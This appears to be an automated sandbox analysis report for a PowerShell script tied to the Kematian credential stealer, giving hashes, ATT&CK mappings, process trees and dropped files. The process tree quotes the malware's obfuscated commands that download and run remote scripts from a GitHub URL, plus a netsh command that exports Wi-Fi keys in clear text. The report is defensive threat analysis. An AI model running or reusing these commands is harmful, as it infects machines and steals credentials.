18382f6c7f8b52c779243c6cc7d4cbc51a95d31d40bc748bc2ec65c63219c358

Analysis

max time kernel
120s
max time network
123s
platform
windows7_x64
resource
win7-20240611-en
resource tags

arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
submitted
05-07-2024 01:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

18382f6c7f8b52c779243c6cc7d4cbc51a95d31d40bc748bc2ec65c63219c358.ps1
Size

72KB
MD5

51299f3a266034e35d706a1d0aa5580b
SHA1

3c9ef68f69b9f8c2941e9d765ae0ae8df9bfdf14
SHA256

18382f6c7f8b52c779243c6cc7d4cbc51a95d31d40bc748bc2ec65c63219c358
SHA512

b125b9e91fd5b3516ed5218d47316a9f4c6f052ae7c4d517eae18abb8643f1145adf117eb2d852ee684e1ffef4d85c0aab33935cebc0effc11e3f160a5bb0b23
SSDEEP

1536:F8SdVn5ahg5yYp6zdv/5l05Qo8l01zhwZPhZcLrJS7srHX6Cg:F8SdVn5Uwiv/5IQo8l01zhw5hUr9KCg

Score

10^/10

execution persistence privilege_escalation

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
3	2512	powershell.exe
4	2512	powershell.exe
5	2764	powershell.exe
6	2764	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1796	powershell.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1796	powershell.exe
1796	powershell.exe
1796	powershell.exe
2512	powershell.exe
1796	powershell.exe
1796	powershell.exe
2764	powershell.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeIncreaseQuotaPrivilege	2272	WMIC.exe
Token: SeSecurityPrivilege	2272	WMIC.exe
Token: SeTakeOwnershipPrivilege	2272	WMIC.exe
Token: SeLoadDriverPrivilege	2272	WMIC.exe
Token: SeSystemProfilePrivilege	2272	WMIC.exe
Token: SeSystemtimePrivilege	2272	WMIC.exe
Token: SeProfSingleProcessPrivilege	2272	WMIC.exe
Token: SeIncBasePriorityPrivilege	2272	WMIC.exe
Token: SeCreatePagefilePrivilege	2272	WMIC.exe
Token: SeBackupPrivilege	2272	WMIC.exe
Token: SeRestorePrivilege	2272	WMIC.exe
Token: SeShutdownPrivilege	2272	WMIC.exe
Token: SeDebugPrivilege	2272	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2272	WMIC.exe
Token: SeRemoteShutdownPrivilege	2272	WMIC.exe
Token: SeUndockPrivilege	2272	WMIC.exe
Token: SeManageVolumePrivilege	2272	WMIC.exe
Token: 33	2272	WMIC.exe
Token: 34	2272	WMIC.exe
Token: 35	2272	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2272	WMIC.exe
Token: SeSecurityPrivilege	2272	WMIC.exe
Token: SeTakeOwnershipPrivilege	2272	WMIC.exe
Token: SeLoadDriverPrivilege	2272	WMIC.exe
Token: SeSystemProfilePrivilege	2272	WMIC.exe
Token: SeSystemtimePrivilege	2272	WMIC.exe
Token: SeProfSingleProcessPrivilege	2272	WMIC.exe
Token: SeIncBasePriorityPrivilege	2272	WMIC.exe
Token: SeCreatePagefilePrivilege	2272	WMIC.exe
Token: SeBackupPrivilege	2272	WMIC.exe
Token: SeRestorePrivilege	2272	WMIC.exe
Token: SeShutdownPrivilege	2272	WMIC.exe
Token: SeDebugPrivilege	2272	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2272	WMIC.exe
Token: SeRemoteShutdownPrivilege	2272	WMIC.exe
Token: SeUndockPrivilege	2272	WMIC.exe
Token: SeManageVolumePrivilege	2272	WMIC.exe
Token: 33	2272	WMIC.exe
Token: 34	2272	WMIC.exe
Token: 35	2272	WMIC.exe
Token: SeDebugPrivilege	2512	powershell.exe
Token: SeDebugPrivilege	2764	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1796 wrote to memory of 2984	1796	powershell.exe	29
PID 1796 wrote to memory of 2984	1796	powershell.exe	29
PID 1796 wrote to memory of 2984	1796	powershell.exe	29
PID 2984 wrote to memory of 2620	2984	csc.exe	30
PID 2984 wrote to memory of 2620	2984	csc.exe	30
PID 2984 wrote to memory of 2620	2984	csc.exe	30
PID 1796 wrote to memory of 2272	1796	powershell.exe	32
PID 1796 wrote to memory of 2272	1796	powershell.exe	32
PID 1796 wrote to memory of 2272	1796	powershell.exe	32
PID 1796 wrote to memory of 2680	1796	powershell.exe	33
PID 1796 wrote to memory of 2680	1796	powershell.exe	33
PID 1796 wrote to memory of 2680	1796	powershell.exe	33
PID 1796 wrote to memory of 2512	1796	powershell.exe	35
PID 1796 wrote to memory of 2512	1796	powershell.exe	35
PID 1796 wrote to memory of 2512	1796	powershell.exe	35
PID 1796 wrote to memory of 2764	1796	powershell.exe	36
PID 1796 wrote to memory of 2764	1796	powershell.exe	36
PID 1796 wrote to memory of 2764	1796	powershell.exe	36
PID 1796 wrote to memory of 2400	1796	powershell.exe	37
PID 1796 wrote to memory of 2400	1796	powershell.exe	37
PID 1796 wrote to memory of 2400	1796	powershell.exe	37
PID 2400 wrote to memory of 2144	2400	csc.exe	38
PID 2400 wrote to memory of 2144	2400	csc.exe	38
PID 2400 wrote to memory of 2144	2400	csc.exe	38

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\18382f6c7f8b52c779243c6cc7d4cbc51a95d31d40bc748bc2ec65c63219c358.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1796
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\friendnf.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2984
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2DD5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2DD4.tmp"
    3⤵
    PID:2620
- C:\Windows\System32\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" path Win32_VideoController get VideoModeDescription /format:csv
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2272
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\Admin\AppData\Local\Temp\wifi key=clear
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2764
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ev-a3twk.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2400
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D4D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5D4C.tmp"
    3⤵
    PID:2144

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES2DD5.tmp

Filesize
1KB

MD5
1cd8aa5c7d8197b1af307facbfb0998b

SHA1
32992d950ed4e5bac3cb1e73a0bea9f9a1219cd3

SHA256
70bd7fd9ef73695e46875c804a10d2031468cb8997d218f9b0c8016776e3b82e

SHA512
0ed61ddbc3e4e8fd7e815f84d0dc50b07804c86c17cc6666ffcb0df2f7a6c4e6110d693bf1ad44e442dc88a9a69e49b599316238203de4db73ea6bf8aebdabfd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5D4D.tmp

Filesize
1KB

MD5
8fe0672b25e68e5f5bf0cc76e0dbd842

SHA1
57e20819c50491f658c995523e3450028fd43643

SHA256
9c3072c602936adf1f7fb65478b7f662dca7850785f562e27ae63be3d5bfcb65

SHA512
2409b78e78c7599c8c0671fb4d0d390dd6d4711226d799a5d40af00ec9d56c04d25ceca0513b79881a1c8f4cc483ef2d3196583713d41b9ae5ef1ef2d2ed7d89

Download Submit
C:\Users\Admin\AppData\Local\Temp\ev-a3twk.dll

Filesize
3KB

MD5
723e0a59cba2774cae889757e3a2555f

SHA1
d64459df9ef09b93813ad8968d59cf5c39bb9ee5

SHA256
bae67f8122d196bc8284b20cd66c5718e1e5e6f71a4d22a22ac5077c297c6486

SHA512
88beb138a9c8c7482d392b69c6097aa10fd33d88d854c65cdb9b74cc4ce677ebe70c3d21ba419a144da3ae82c1b8c4d1ebcf77ddd7e1d5bf5355fcdc5009dc84

Download Submit
C:\Users\Admin\AppData\Local\Temp\ev-a3twk.pdb

Filesize
11KB

MD5
96c642f06091dc0862fdf2cf6ffae28b

SHA1
6d7f3db0c16eba1c8fea0032aa458f1f6050cc58

SHA256
8b6372e45bceea7e71696ac98c1bd8847b1a697f8d6d88395f6974fdf7dca02a

SHA512
67145a227064d35276853a70b16054579cdd7cb12b1e558883190275ba808c101c51108986a8c7f682c3dc6107085cc4be694fc958bf1aa0ae7f40e2b840c6e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\friendnf.dll

Filesize
3KB

MD5
77e742e9c06e79a7d8c174337318d385

SHA1
6b12b11dff4de2e451afb191d2915102d8895d7e

SHA256
afd26eca95ef18e55d90d9e5d5e8d1f353273ab8ebd051edaf631ac5c558c4f5

SHA512
3c04ac6d95eb189389a1089983f22fb9a7ad5b3375d85dbec698d43b785bcd60f98e06a4ab128652a69c209dd717271c0cb1b53769860f6e4482f268032fb9c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\friendnf.pdb

Filesize
11KB

MD5
00e6578a52e32d7a32444994f800668c

SHA1
6252a67d0212877904ccdba97454757aa728c58b

SHA256
2d5f642ca2d7cfbe8bdb4a3485bab2323a83efa41362a8da5981da40c4b672d9

SHA512
31a178e995e489d59f3d632834eb7eceb087f96b8189d61e4d15763aa269350544d68765adfba09664626df10d296c7e32af32db320ec76c88dbfdb5e8846d1d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ddd95354b39949fba1a3d4145a74cc6a

SHA1
a77eb10fc0810ea52009c49861e4e5addb85dfa6

SHA256
a2ba45dca6c76acf1f8e766dcc74f4125cbe9b79f9bf3894a96963c39ecd7920

SHA512
fb09efe83b803f5b42c5698382456cdabc3e4b73d504163fe7e1bdf791818dab8819ba3bbcb33b8d504c39875b5d1157471f05ea952d45a5281791aa884b5252

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC2DD4.tmp

Filesize
652B

MD5
ee1050813fb998ae4fba5f7ecaa102c7

SHA1
4b16e58d01ff7a29ad389a4ed179c2e4331478a8

SHA256
3892d433ac2c376ac595f9feff97c6741351fb5ad558eeb23e094eecc6335c28

SHA512
a224dc7accb2fa95096390430da4b0a2f696ec13b09cc062671670828c92f5fd17652993c474bb7f28c44b9b9c5c079301f4d6f4076ef980f9364bd40640e652

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC5D4C.tmp

Filesize
652B

MD5
776c8fe5bab418ddf5ae626928abca86

SHA1
d56e785acef2f3bf687b4961617242913c43a645

SHA256
777db17e2be91f62dda312823719280caf5a25ae9caecdb5315c318ca52daabe

SHA512
81ec04ee7025c2761e34d3c431efb640a9f5a2c02b7abd2e2646dac727ee361eedcf3fca352010e0f870d9ad1edf00fc07fdd1d26ac23b01a76e96093af94b70

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ev-a3twk.0.cs

Filesize
321B

MD5
249ab1409c1ad0e025a82d513e4f7f12

SHA1
f38f701e2e6be38739f36d04586f90f39babf2ad

SHA256
9babf0e0294d1743f12c4fb3ddac50ca25c75accd223c4f1716d916f659c538c

SHA512
3abcdec5ed668a291dde15344368549174d2562196285a3f521613c7bd3b1ab80f189439b08e7c4f57c5269f6159aa154c0cc503df3640bfc51712635c3a12bc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ev-a3twk.cmdline

Filesize
309B

MD5
04da0d07d6d05fe931b28c190b59c226

SHA1
286ce674421e705c82168caf8895181fd007c8d1

SHA256
f2ec91084a7e78edf22824e09c325a5b56ef5677a3e1b8807c357991995fb90b

SHA512
faf9846eb9c594ea99dfcb8b43692aaca4b3995f2f6cfde26899336271bb18d5bd2274cd045c86569127f7a204e80d88a4096a5d0879bea041eff83d6e5640ad

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\friendnf.0.cs

Filesize
512B

MD5
a36c5dbd22147371b4ea6ffacb560fb6

SHA1
e7248cd6a49d3aae9439efdffaceeacad6a7c523

SHA256
fc874c6cbd59c24e83702e0cd6f301c4a929865687d8e0d041090a2bcd801a60

SHA512
256b2e0beea6305f21024d60acdb0dcc84c2da46824d1c0610a9a22fa0e8c1753271140db278baf26e260c381f13001be1e8c651b01a178ca0922a2ab1bf4361

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\friendnf.cmdline

Filesize
309B

MD5
f2588e9fc7b02acb9edf467b122bfc42

SHA1
88113fd998b90f449704b3243e43da51155e2af6

SHA256
04cd878f10c804dca4e3a064c32367de3ac14e07dfa86047abf526b84bc215d9

SHA512
2862324189280768ccf71766260bdb404795c1537030cf09cb48d7e17de06cd56fef0b89ca02d9904a5460e97dac3b5bb75a4c6159f22400492185bcf41fc7ed

Download Submit
memory/1796-9-0x00000000028F0000-0x00000000028FC000-memory.dmp

Filesize
48KB

Download
memory/1796-15-0x000000001BD70000-0x000000001BE46000-memory.dmp

Filesize
856KB

Download
memory/1796-11-0x0000000002920000-0x000000000292E000-memory.dmp

Filesize
56KB

Download
memory/1796-8-0x000007FEF4A10000-0x000007FEF53AD000-memory.dmp

Filesize
9.6MB

Download
memory/1796-13-0x000007FEF4A10000-0x000007FEF53AD000-memory.dmp

Filesize
9.6MB

Download
memory/1796-4-0x000007FEF4CCE000-0x000007FEF4CCF000-memory.dmp

Filesize
4KB

Download
memory/1796-31-0x0000000002BD0000-0x0000000002BD8000-memory.dmp

Filesize
32KB

Download
memory/1796-12-0x000007FEF4A10000-0x000007FEF53AD000-memory.dmp

Filesize
9.6MB

Download
memory/1796-69-0x000007FEF4A10000-0x000007FEF53AD000-memory.dmp

Filesize
9.6MB

Download
memory/1796-35-0x000007FEF4A10000-0x000007FEF53AD000-memory.dmp

Filesize
9.6MB

Download
memory/1796-17-0x000000001BF00000-0x000000001BF86000-memory.dmp

Filesize
536KB

Download
memory/1796-10-0x0000000002900000-0x000000000291C000-memory.dmp

Filesize
112KB

Download
memory/1796-16-0x000007FEF4A10000-0x000007FEF53AD000-memory.dmp

Filesize
9.6MB

Download
memory/1796-14-0x0000000002D90000-0x0000000002DEA000-memory.dmp

Filesize
360KB

Download
memory/1796-7-0x000007FEF4A10000-0x000007FEF53AD000-memory.dmp

Filesize
9.6MB

Download
memory/1796-62-0x00000000029D0000-0x00000000029D8000-memory.dmp

Filesize
32KB

Download
memory/1796-6-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/1796-5-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download
memory/1796-65-0x000007FEF4A10000-0x000007FEF53AD000-memory.dmp

Filesize
9.6MB

Download
memory/1796-66-0x000007FEF4CCE000-0x000007FEF4CCF000-memory.dmp

Filesize
4KB

Download
memory/1796-67-0x000007FEF4A10000-0x000007FEF53AD000-memory.dmp

Filesize
9.6MB

Download
memory/2984-68-0x000007FEF4A10000-0x000007FEF53AD000-memory.dmp

Filesize
9.6MB

Download
memory/2984-34-0x000007FEF4A10000-0x000007FEF53AD000-memory.dmp

Filesize
9.6MB

Download